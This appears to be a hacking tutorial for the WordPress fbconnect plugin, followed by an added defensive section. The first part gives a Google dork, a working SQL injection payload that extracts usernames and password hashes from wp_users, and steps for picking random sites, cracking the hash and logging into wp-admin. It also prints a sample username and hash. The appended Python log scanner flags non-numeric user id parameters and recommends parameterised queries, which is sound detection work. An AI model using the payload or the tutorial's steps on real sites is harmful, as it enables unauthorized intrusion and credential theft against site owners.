inurl:"fbconnect_action=myhome"
Exploit:
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,
7,8,9,10,11,12+from+wp_users--
1- Copy the dork and paste it into Google
2- Choose any site and you will see something like this or similar,
Exploiting Target
1- Let's say your target URL looks like this:
http://www.site.com/?fbconnect_action=myhome&userid=3
Append the exploit to the URL, so it looks like this:
http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--
2- So there you go, you have the Username and the Password. But, don't forget to decrypt it first ;)
user:password
So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.
3- After you have successfully decrypted the password, you can log in to the website at
www.site.com/wp-login.php
or
www.site.com/wp-admin
* Decryption
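A defensive counterpart, added here and not part of the original post: requests like the ones above stand out in web-server access logs, because the fbuserid (or userid) parameter of a fbconnect_action=myhome request should only ever be a plain number. The log lines, client addresses and function names below are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines; addresses are documentation placeholders.
SAMPLE_LOG = '''\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /?fbconnect_action=myhome&fbuserid=3 HTTP/1.1" 200 5120
203.0.113.9 - - [12/Mar/2024:10:01:09 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3+from+wp_users-- HTTP/1.1" 200 6011
203.0.113.9 - - [12/Mar/2024:10:01:15 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 6011
198.51.100.4 - - [12/Mar/2024:10:02:00 +0000] "GET /?p=12 HTTP/1.1" 200 900
'''

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
ID_PARAMS = ("fbuserid", "userid")      # both spellings appear in the post
NUMERIC_RE = re.compile(r"[0-9]+")      # the only legitimate shape of a user id


def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text):
    """Return (client, parameter, decoded value) for every non-numeric user id."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "myhome" not in params.get("fbconnect_action", []):
            continue
        for name in ID_PARAMS:
            for raw in params.get(name, []):
                value = fully_decode(raw)
                if not NUMERIC_RE.fullmatch(value):
                    hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric {name}: {value!r}")
```

The same allow-list rule (digits only) is the fix on the server side: cast the parameter to an integer or bind it in a prepared statement before it reaches the query.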